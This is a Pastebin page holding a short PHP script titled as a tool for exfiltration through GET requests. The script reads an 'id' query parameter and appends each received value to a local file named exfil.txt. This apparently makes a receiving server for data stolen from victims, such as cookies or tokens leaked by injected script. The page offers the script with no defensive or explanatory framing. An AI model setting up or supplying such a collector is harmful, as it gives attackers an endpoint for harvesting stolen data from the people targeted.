Advertisement
fenix_of_fire

Exfiltration_with_GET_method

Aug 2nd, 2019
205
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 0.11 KB | None | 0 0
  1. <?php
  2. $id = $_GET['id'];
  3. $id2 = $id."\n";
  4. $fp = fopen('./exfil.txt', 'a+');
  5. fwrite($fp, $id2);
  6. fclose($fp);
  7. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement